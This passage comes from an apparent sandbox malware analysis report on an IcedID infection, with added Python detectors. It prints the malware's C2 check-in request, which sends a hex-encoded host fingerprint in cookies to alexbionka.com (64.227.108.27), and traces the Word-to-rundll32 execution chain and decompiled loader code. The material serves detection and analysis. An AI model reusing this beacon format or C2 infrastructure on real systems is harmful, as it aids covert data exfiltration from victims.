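    size_of_image = struct.unpack_from("<I", data, opt + 56)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    ndirs = struct.unpack_from("<I", data, opt + 108)[0]
    dirs = [struct.unpack_from("<II", data, opt + 112 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsect):
        off = opt + opt_size + 40 * i
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        sections.append({"name": name.rstrip(b"\x00").decode("ascii"),
                         "vsize": vsize, "va": va, "raw_size": raw_size, "raw_ptr": raw_ptr,
                         "chars": struct.unpack_from("<I", data, off + 36)[0]})
    return {
        "machine": machine,
        "is_amd64": machine == IMAGE_FILE_MACHINE_AMD64,
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "timestamp": tstamp,
        "compile_time_utc": datetime.fromtimestamp(tstamp, tz=timezone.utc).isoformat(),
        "entry_point": entry,
        "image_base": image_base,
        "size_of_image": size_of_image,
        "dynamic_base": bool(dll_chars & DLL_DYNAMIC_BASE),
        "nx_compat": bool(dll_chars & DLL_NX_COMPAT),
        "export_dir": dirs[0],
        "import_dir": dirs[1],
        "sections": sections,
        # On disk the file must extend at least to the end of the last section's raw data.
        "expected_file_size": max(s["raw_ptr"] + s["raw_size"] for s in sections),
    }


def check_against_session(info: dict, content_length: int, expected_base: int) -> list:
    """Cross-check parsed headers against facts visible elsewhere in the session/report."""
    problems = []
    if info["expected_file_size"] != content_length:
        problems.append(f"section layout covers {info['expected_file_size']} bytes, "
                        f"Content-Length is {content_length}")
    if info["image_base"] != expected_base:
        problems.append(f"image base {info['image_base']:#x} differs from dump base {expected_base:#x}")
    if not info["is_dll"]:
        problems.append("IMAGE_FILE_DLL not set although the file is served as a .dll")
    return problems


if __name__ == "__main__":
    info = parse_pe32plus(SAMPLE_HEADER)
    print({k: v for k, v in info.items() if k != "sections"})
    print(check_against_session(info, content_length=360448, expected_base=0x180000000))
```

The section layout (.rsrc raw data ends at 0x57e00 + 0x200 = 0x58000) accounts for exactly the 360448 bytes announced in Content-Length, so the dump shows a complete PE file rather than a truncated one. The import directory is empty (RVA 0, size 0) while the 0x17d-byte export directory coincides with the whole .rdata section: the DLL imports nothing statically and exposes only what rundll32 needs to call it by ordinal, which fits the report's "Contains functionality to dynamically determine API calls" signature. The TimeDateStamp 0x62f4d159 decodes to 2022-08-11 09:52:25 UTC, about five and a half hours before the 15:27 UTC download recorded in the Date header above.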


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49172 | 64.227.108.27 | 80 | C:\Windows\System32\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Aug 11, 2022 17:28:05.028685093 CEST | 379 | OUT | GET / HTTP/1.1
                                                Connection: Keep-Alive
                                                Cookie: __gads=3570055661:1:5038:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:30423335313032443133344136373743; __io=0; _gid=67AFEDC5AC03
                                                Host: alexbionka.com
Aug 11, 2022 17:28:05.683288097 CEST | 379 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 11 Aug 2022 15:28:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 31 30 63 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 6c 65 78 62 69 6f 6e 6b 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0
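This second session is the IcedID first check-in in its characteristic shape: a bare GET / from rundll32.exe with no User-Agent (the "HTTP GET or POST without a user agent" signature), only Connection, Cookie and Host headers, and a Cookie line whose six names (__gads, _gat, _ga, _u, __io, _gid) carry the host fingerprint. The Python below is an added example, not code from this report or from Joe Sandbox. It parses the captured request (copied from the session above) plus a constructed benign browser request, hex-decodes the colon-separated _u segments, and reads _gat as an OS version string. Treating _gat as an OS version is an assumption that the first session's User-Agent (Windows NT 6.1; Win64; x64) happens to agree with; which decoded _u segment is the host name and which the user name is not settled by this page, so the code returns the decoded strings without naming them.

```python
import re

# Request captured above (session 1, rundll32.exe -> alexbionka.com), used as the
# sample input. BENIGN_REQUEST is constructed here only to show that the detector
# does not fire on an ordinary browser request carrying a Google Analytics cookie.
CAPTURED_CHECKIN = (
    "GET / HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Cookie: __gads=3570055661:1:5038:57; _gat=6.1.7601.64; _ga=1.329303.0.5; "
    "_u=323130393739:416C627573:30423335313032443133344136373743; __io=0; _gid=67AFEDC5AC03\r\n"
    "Host: alexbionka.com\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) ExampleBrowser/1.0\r\n"
    "Cookie: _ga=GA1.2.123456789.1660000000; session=abcdef\r\n"
    "\r\n"
)

# The six cookie names seen in the capture; together they make up the fingerprint.
ICEDID_COOKIE_NAMES = {"__gads", "_gat", "_ga", "_u", "__io", "_gid"}
OS_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)\.(32|64)")


def parse_request(raw: str):
    """Split an HTTP/1.1 request head into (method, path, {lower-cased header: value})."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_cookies(value: str) -> dict:
    cookies = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        if name:
            cookies[name] = val
    return cookies


def hex_ascii_segments(value: str) -> list:
    """Decode ':'-separated hex strings to ASCII; segments that are not even-length
    hex, or do not decode to ASCII, are returned unchanged."""
    out = []
    for seg in value.split(":"):
        if seg and len(seg) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", seg):
            try:
                out.append(bytes.fromhex(seg).decode("ascii"))
                continue
            except UnicodeDecodeError:
                pass
        out.append(seg)
    return out


def assess_checkin(raw: str) -> dict:
    """Score one request against the traits of the captured IcedID check-in."""
    method, path, headers = parse_request(raw)
    cookies = parse_cookies(headers.get("cookie", ""))
    reasons = []
    if "user-agent" not in headers:
        reasons.append("no User-Agent header")
    if set(headers) <= {"connection", "cookie", "host"}:
        reasons.append("only Connection/Cookie/Host headers")
    if ICEDID_COOKIE_NAMES <= set(cookies):
        reasons.append("all six IcedID cookie names present")
    decoded_u = hex_ascii_segments(cookies["_u"]) if "_u" in cookies else []
    if decoded_u and decoded_u != cookies["_u"].split(":") and all(s.isprintable() for s in decoded_u):
        reasons.append(f"_u is hex-encoded ASCII: {decoded_u}")
    os_version = None
    m = OS_VERSION_RE.fullmatch(cookies.get("_gat", ""))
    if m:
        os_version = {"major": int(m[1]), "minor": int(m[2]), "build": int(m[3]), "bits": int(m[4])}
        reasons.append(f"_gat reads as an OS version: {cookies['_gat']}")
    return {"method": method, "path": path, "host": headers.get("host"),
            "icedid_checkin": len(reasons) >= 3,   # threshold chosen for this example
            "reasons": reasons, "decoded_u": decoded_u, "os_version": os_version}


if __name__ == "__main__":
    for name, req in (("captured", CAPTURED_CHECKIN), ("benign", BENIGN_REQUEST)):
        print(name, assess_checkin(req))
```

On the captured request all five traits fire: _u decodes to the three ASCII strings "210979", "Albus" and "0B35102D134A677C", and _gat = 6.1.7601.64 matches the NT 6.1 build 7601, 64-bit platform that the first session's User-Agent announced. A network detection should key on the cookie-name set and the hex-encoded _u rather than on the domain, since alexbionka.com is just the one C2 host this run resolved (64.227.108.27) and answered 404 to; the response body is the generic nginx/Apache page and carries nothing bot-specific.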



                                                Target ID:0
                                                Start time:17:27:17
                                                Start date:11/08/2022
                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                Imagebase:0x13f220000
                                                File size:1423704 bytes
                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:4
                                                Start time:17:27:28
                                                Start date:11/08/2022
                                                Path:C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
                                                Imagebase:0x40000
                                                File size:44544 bytes
                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 0%, Metadefender, Browse
                                                • Detection: 0%, ReversingLabs
                                                Reputation:high

                                                Target ID:5
                                                Start time:17:27:29
                                                Start date:11/08/2022
                                                Path:C:\Windows\System32\rundll32.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
                                                Imagebase:0xffbd0000
                                                File size:45568 bytes
                                                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                Reputation:high
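The three Target entries describe the execution chain: WINWORD.EXE writes r8F8A.tmp.exe and y84FE.tmp.dll to the user's Temp directory and starts the .exe with rundll32-style arguments ("<dll>",#1); that 32-bit process (Wow64 process: true, 0% AV detection, reputation high) then starts the native C:\Windows\System32\rundll32.exe with the identical command line. The behaviour is consistent with a renamed 32-bit copy of rundll32.exe being handed a 64-bit DLL and relaunching its native counterpart (the execution graph later in this report lists the IsWow64Process, GetNativeSystemInfo, GetSystemDirectoryW, Wow64EnableWow64FsRedirection and CreateProcessW path); that reading is an inference from these entries, not a statement the report makes. The Python below is an added example, not part of the report: it runs four process-creation rules over events reconstructed from the Target entries. The parent links and the Sysmon-like event shape are assumptions; this section does not print parent process IDs.

```python
import re
from pathlib import PureWindowsPath

# Process-creation events reconstructed from the three "Target ID" entries above
# (image path, command line, Wow64 flag). The "parent" links are an assumption:
# this section of the report does not print parent process IDs.
OFFICE = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
DROPPED_EXE = r"C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe"
DROPPED_DLL = r"C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll"
NATIVE_RUNDLL = r"C:\Windows\System32\rundll32.exe"
RUNDLL_CMD = f'"{DROPPED_EXE}" "{DROPPED_DLL}",#1'

EVENTS = [
    {"id": 0, "image": OFFICE, "cmdline": f'"{OFFICE}" /Automation -Embedding',
     "parent": None, "wow64": False},
    {"id": 4, "image": DROPPED_EXE, "cmdline": RUNDLL_CMD, "parent": OFFICE, "wow64": True},
    {"id": 5, "image": NATIVE_RUNDLL, "cmdline": RUNDLL_CMD, "parent": DROPPED_EXE, "wow64": False},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Quoted rundll32 syntax only:  "<exe>" "<dll>",#<ordinal>   or   "<exe>" "<dll>",<ExportName>
RUNDLL_SYNTAX = re.compile(r'^"(?P<exe>[^"]+)"\s+"(?P<dll>[^"]+)"\s*,\s*(?P<entry>#?\w+)\s*$')


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def in_user_temp(path: str) -> bool:
    return "\\appdata\\local\\temp\\" in path.lower()


def evaluate(event: dict, by_image: dict) -> list:
    """Return the names of the rules that fire for one process-creation event."""
    findings = []
    parent = event["parent"]
    image_name = basename(event["image"])

    # Rule 1: an Office application starts an executable out of the user's Temp directory.
    if parent and basename(parent) in OFFICE_APPS and in_user_temp(event["image"]):
        findings.append("office_spawns_temp_exe")

    m = RUNDLL_SYNTAX.match(event["cmdline"])
    if m:
        # Rule 2: rundll32-style arguments, but the image is not called rundll32.exe.
        if image_name != "rundll32.exe":
            findings.append("rundll32_syntax_under_other_name")
        # Rule 3: the DLL loaded by export is a *.tmp.dll in the user's Temp directory.
        if in_user_temp(m["dll"]) and m["dll"].lower().endswith(".tmp.dll"):
            findings.append("tmp_dll_loaded_by_export")
        # Rule 4: the native rundll32.exe is started by a 32-bit, differently named
        # parent with exactly the same command line (the WoW64 relaunch seen above).
        p = by_image.get(parent) if parent else None
        if (image_name == "rundll32.exe" and p and p["wow64"] and not event["wow64"]
                and p["cmdline"] == event["cmdline"] and basename(parent) != "rundll32.exe"):
            findings.append("wow64_relaunch_with_identical_cmdline")
    return findings


def run(events: list) -> dict:
    """Evaluate every event; parents are looked up by image path (one event per image here)."""
    by_image = {e["image"]: e for e in events}
    return {e["id"]: evaluate(e, by_image) for e in events}


if __name__ == "__main__":
    for target_id, hits in run(EVENTS).items():
        print(target_id, hits or "-")
```

Rule 2 is the one that survives hash-based evasion: the dropped copy is clean by every AV in the report, so the tell is a rundll32 command line under a non-rundll32 image name, combined with the Temp-directory DLL and ordinal export of rule 3. Rule 4 catches the same chain one step later from the native rundll32.exe's point of view, which matters when the renamed copy's own creation event is missed. In production telemetry the parent lookup would use the parent PID rather than the image path.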

Call Graph

Module: __Unknown_Module_Name__
callgraph 1 Error: Graph is empty (no declarations or lines are listed for this module)

                                                  Execution Graph

                                                  Execution Coverage:20.8%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:16.2%
                                                  Total number of Nodes:315
                                                  Total number of Limit Nodes:7
                                                  Execution graph (an interactive figure in the original report; the node/edge dump is omitted here). Nodes are function start addresses in the image mapped at 0x40000 in process 4, labelled with the APIs each function calls. Executed edges run from the CRT entry 0004178C (via 00041593: GetSystemTimeAsFileTime/GetCurrentProcessId/GetCurrentThreadId/GetTickCount/QueryPerformanceCounter, the __security_init_cookie pattern, then GetStartupInfoW and _initterm) into 00041203 (HeapSetInformation, NtSetInformationProcess, lstrlenW, LocalAlloc), whose C-code is shown below. From there: the DLL-loading path 00041B87 -> 000414BD (LoadLibraryExW, RtlImageNtHeader, SetProcessDEPPolicy) and 00041C02 (lstrlenW, LocalAlloc, WideCharToMultiByte, GetProcAddress); the manifest path 00041E56 (GetFileAttributesW, SearchPathW, CreateActCtxW); the token path 000419E3 -> 00041A33 (NtOpenProcessToken, NtQueryInformationToken) and 000420B4 (QueryActCtxW); the window path 000413B9 (LoadIconW, LoadCursorW, RegisterClassW, CreateWindowExW); error reporting 0004389E -> 00042CCF (LoadStringW, _vsnwprintf, MessageBoxW); the WoW64 re-launch helper 000439D0 (IsWow64Process, GetNativeSystemInfo, GetSystemDirectoryW, Wow64EnableWow64FsRedirection, GetCommandLineW, CreateProcessW, WaitForSingleObject); and the delay-load helper 00043B77 (LoadLibraryExA, InterlockedCompareExchange, GetProcAddress, DelayLoadFailureHook).

                                                  Callgraph
                                                  Callgraph (an interactive figure in the original; the edge list is omitted). Its root is Function_0004178C, which calls Function_00041203; Function_00041203 in turn calls 00041AE1, 00041622, 00043955, 00041E56, 000419E3, 00041B87, 00041467, 000413B9, 00041444, 0004389E and 0004138B, matching the call order in its C-code below. Error reporting funnels through Function_0004389E -> Function_00042CCF, and the WoW64 re-launch path is Function_000439D0 -> Function_000429B3 / Function_0004384E.

                                                  Control-flow Graph

                                                  C-Code - Quality: 94%
                                                  			E00041203(char _a4, WCHAR* _a12, intOrPtr _a16) {
                                                  				// Analyst annotations (added to the decompiler output): _a4 is used as the HINSTANCE for
                                                  				// RegisterClassW/CreateWindowExW further down, _a12 is the command line to parse.
                                                  				int _v8;
                                                  				int _v12;
                                                  				char _v16;
                                                  				void* _v20;
                                                  				void _v24;
                                                  				signed int _v28;
                                                  				char _v32;
                                                  				char _v36;
                                                  				intOrPtr _v40;
                                                  				void* _t46;
                                                  				void* _t51;
                                                  				intOrPtr _t64;
                                                  				void* _t65;
                                                  				void* _t69;
                                                  				void* _t72;
                                                  				void* _t73;
                                                  				struct HWND__* _t77;
                                                  
                                                  				_t71 = 1;
                                                  				__imp__HeapSetInformation(0, 1, 0, 0); // HeapEnableTerminationOnCorruption (1): heap corruption aborts the process
                                                  				_v24 = 1;
                                                  				NtSetInformationProcess(0xffffffff, 0x22,  &_v24, 4); // executed; class 0x22 = ProcessExecuteFlags, value 1 = MEM_EXECUTE_OPTION_DISABLE (DEP enforced)
                                                  				_t76 = lstrlenW(_a12) + 1;
                                                  				 *0x4504c = _a4; // saved instance handle, reused for the "RunDLL" window class below
                                                  				_t46 = LocalAlloc(0x40, lstrlenW(_a12) + 1 + _t76); // LPTR buffer of twice the command-line length
                                                  				_v20 = _t46;
                                                  				if(_t46 == 0) {
                                                  					L13:
                                                  					ExitProcess(0);
                                                  				}
                                                  				// E00041AE1 copies the command line into the buffer; E00041622 (lstrlenW/CompareStringW/CharNextW)
                                                  				// splits it into flags (_v28), DLL path (_a4), entry point (_v32) and remaining arguments (_a12).
                                                  				if(E00041AE1(_t46, _t76, _a12) >= 0 && E00041622(_t76, _v20,  &_v28,  &_a4,  &_v32,  &_a12) != 0) {
                                                  					_t81 = _v28 & 1;
                                                  					if((_v28 & 1) != 0) {
                                                  						E00043955(_a4, _a12);
                                                  					} else {
                                                  						SetErrorMode(0x8001); // executed; SEM_FAILCRITICALERRORS | SEM_NOOPENFILEERRORBOX: no error dialogs while loading the DLL
                                                  						_v16 = 0;
                                                  						_t64 = E00041E56(_t72, _a4,  &_v16, 1); // executed; looks for <dll>.manifest and builds/activates an activation context (GetFileAttributesW, CreateActCtxW, ActivateActCtx)
                                                  						_v40 = _t64;
                                                  						_t65 = E000419E3(_t72, _t81, _t64); // executed; checks the manifest's requestedRunLevel and, if none is declared, enables UAC virtualization (shown below)
                                                  						_t82 = _t65;
                                                  						if(_t65 == 0) {
                                                  							_t51 = E0004389E(_t73,  *0x4504c, 0x403, _a4, L"requestedRunLevel"); // error path: LoadStringW / _vsnwprintf / MessageBoxW
                                                  						} else {
                                                  							_v12 = 0;
                                                  							_v8 = 0;
                                                  							_t69 = E00041B87(_t73, _t82,  *0x4504c, _a4, _v32, _a12,  &_v8,  &_v36,  &_v12); // executed; LoadLibraryExW of the DLL (000414BD, also sets SetProcessDEPPolicy) and GetProcAddress of the entry point (00041C02); _v8 = module handle, _v36 = resolved export
                                                  							_t71 = _v12;
                                                  							if(_t69 != 0) {
                                                  								if(_t71 != 0) {
                                                  									_a12 = _t71;
                                                  								}
                                                  								E00041467(_t72, _v8); // RtlImageNtHeader + ImageDirectoryEntryToData(..., 0xA = IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG) on the loaded DLL
                                                  								_t77 = E000413B9( *0x4504c, L"RunDLL"); // registers the "RunDLL" window class and creates the host window
                                                  								E00041444(_v36, _t77,  *0x4504c, _a12, _a16); // body not shown in this excerpt
                                                  								if(_t77 != 0) {
                                                  									DestroyWindow(_t77);
                                                  								}
                                                  								FreeLibrary(_v8);
                                                  							}
                                                  							_t51 = LocalFree(_t71);
                                                  						}
                                                  						E0004138B(_t51, _v40, _v16); // DeactivateActCtx / ReleaseActCtx
                                                  					}
                                                  				}
                                                  				LocalFree(_v20);
                                                  				goto L13;
                                                  			}
                                                  
                                                  Call-site addresses for the C lines above (the original report shows them as a column beside the code, one per source line, in this order):
                                                  0x00041214 0x00041217 0x00041227 0x0004122a 0x0004123e 0x0004123f 0x0004124a 0x00041250 0x00041255 0x00041355 0x00041356 0x00041356 0x00041267 0x0004128d 0x00041290 0x000424d8 0x00041296 0x0004129b 0x000412a9 0x000412ac 0x000412b2 0x000412b5 0x000412ba 0x000412bc 0x000424c8 0x000412c2 0x000412d1 0x000412d7 0x000412e3 0x000412e8 0x000412ed 0x000412f1 0x000421db 0x000421db 0x000412fa 0x00041312 0x00041321 0x00041328 0x0004132b 0x0004132b 0x00041334 0x00041334 0x0004133b 0x0004133b 0x00041347 0x00041347 0x00041290 0x0004134f 0x00000000

                                                  APIs
                                                  • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,00045068,00000001,00000000), ref: 00041217
                                                  • NtSetInformationProcess.NTDLL ref: 0004122A
                                                  • lstrlenW.KERNEL32(?), ref: 00041233
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 0004124A
                                                  • SetErrorMode.KERNELBASE(00008001,?,?,?,?,?,00000000,00000001,?), ref: 0004129B
                                                    • Part of subcall function 00041E56: GetFileAttributesW.KERNELBASE(?,00000000,00000001,00000001), ref: 00041E7F
                                                    • Part of subcall function 00041E56: lstrlenW.KERNEL32(?), ref: 00041ECA
                                                    • Part of subcall function 00041E56: GetFileAttributesW.KERNELBASE(?,?,00000104,.manifest), ref: 00041EF5
                                                    • Part of subcall function 00041E56: CreateActCtxW.KERNEL32(00000020), ref: 00041F31
                                                    • Part of subcall function 00041E56: CreateActCtxW.KERNEL32(00000020), ref: 00041F4F
                                                    • Part of subcall function 00041E56: CreateActCtxW.KERNEL32(00000020), ref: 00041F69
                                                    • Part of subcall function 00041E56: GetModuleHandleW.KERNEL32(00000000), ref: 00041FA3
                                                    • Part of subcall function 00041E56: CreateActCtxW.KERNEL32(00000000), ref: 00041FC0
                                                    • Part of subcall function 00041E56: ActivateActCtx.KERNEL32(00000000,?), ref: 00041FCD
                                                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,00000000,?,?,00000001), ref: 0004133B
                                                    • Part of subcall function 00041467: RtlImageNtHeader.NTDLL(?), ref: 0004147A
                                                    • Part of subcall function 00041467: ImageDirectoryEntryToData.IMAGEHLP(?,00000001,0000000A,00000001,?,?,000412FF,00000001,?,?,?,00000001,?,?,00000000,?), ref: 0004149C
                                                    • Part of subcall function 000413B9: LoadIconW.USER32 ref: 000413E3
                                                    • Part of subcall function 000413B9: LoadCursorW.USER32 ref: 000413F2
                                                    • Part of subcall function 000413B9: RegisterClassW.USER32 ref: 00041413
                                                    • Part of subcall function 000413B9: CreateWindowExW.USER32 ref: 00041432
                                                  • DestroyWindow.USER32 ref: 0004132B
                                                  • FreeLibrary.KERNEL32(00000001,?,00000000,?,?,RunDLL,00000001,?,?,?,00000001,?,?,00000000,?,?), ref: 00041334
                                                  • LocalFree.KERNEL32(?,00000000,00000001,?), ref: 0004134F
                                                  • ExitProcess.KERNEL32 ref: 00041356
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: Create$FreeLocal$AttributesFileImageInformationLoadProcessWindowlstrlen$ActivateAllocClassCursorDataDestroyDirectoryEntryErrorExitHandleHeaderHeapIconLibraryModeModuleRegister
                                                  • String ID: RunDLL$requestedRunLevel
                                                  • API String ID: 1179100334-3494409908
                                                  • Opcode ID: 11995ecdbae17008b2ae548166e607f367664a0cfcc8911c18cd08c3ca958497
                                                  • Instruction ID: 8acc38ae27a96280afcf1ba986d0feef30cbd0fb521348ed4e8fe71e57bcbf06
                                                  • Opcode Fuzzy Hash: 11995ecdbae17008b2ae548166e607f367664a0cfcc8911c18cd08c3ca958497
                                                  • Instruction Fuzzy Hash: A34129F9800249FBDF11AFA0DD45DEE7FB9FF49341B104125FA11A1062D7758A909BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph
                                                  Control-flow graph of E000414BD (an interactive figure in the original; the basic-block edge list is omitted). Blocks: 414bd-414f5 LoadLibraryExW; if the module loaded, 414fb-41504 RtlImageNtHeader, 41506-4150f, 41511-41513 SetProcessDEPPolicy, 41519 and 4151f-4152d (call 41189); if it did not, 423fc-42409 GetLastError, then either 4243f-4244f or 4240b-4240c (call 439e5) followed by 42411-42413 and 42415-42417 or 4241c-4243d, joining at 42454-4245c FormatMessageW and 42462-4247a (call 4389e, the error-message path) before returning through 41519.
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008,00000000,00000000,00000001), ref: 000414E7
                                                  • RtlImageNtHeader.NTDLL(00000000), ref: 000414FC
                                                  • SetProcessDEPPolicy.KERNEL32(00000003), ref: 00041513
                                                  • GetLastError.KERNEL32 ref: 000423FC
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: ErrorHeaderImageLastLibraryLoadPolicyProcess
                                                  • String ID:
                                                  • API String ID: 1237969533-0
                                                  • Opcode ID: 4bd27df8d08a7472ce0620ec1824d8165e371b72b7b535899790f2d5a18445d5
                                                  • Instruction ID: ecf908c1b33cb343e9229699cb265155f71988ea072e503f0a4a247bd0abc636
                                                  • Opcode Fuzzy Hash: 4bd27df8d08a7472ce0620ec1824d8165e371b72b7b535899790f2d5a18445d5
                                                  • Instruction Fuzzy Hash: B42180F5A40218BFEB20DB60CD89FEA77ADEB45344F500475F605D2191DAB48EC88A64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph
                                                  Control-flow graph of E000419E3 (an interactive figure in the original; the edge list is omitted). Blocks: 419e3-41a00 (call 41a33); 41a02-41a06 tests the result; 41a08-41a1a (call 420b4), then either 41a20-41a21 (run level 1, asInvoker, or any other non-zero value via 42383-42385, which clears the return value) or 42108-4211b NtOpenProcessToken followed by 42121-42142 NtSetInformationToken and NtClose; all paths return through 41a27-41a2b.
                                                  C-Code - Quality: 36%
                                                  			E000419E3(void* __ecx, void* __eflags, void* _a4) {
                                                  				// Analyst annotations (added to the decompiler output): this is the requestedRunLevel check
                                                  				// the caller reports on when it fails. _a4 is the activation context handle from E00041E56.
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				void* _t16;
                                                  				signed int _t21;
                                                  				void** _t22;
                                                  				void* _t28;
                                                  
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_v12 = _v12 & 0x00000000;
                                                  				_v8 = _v8 & 0x00000000;
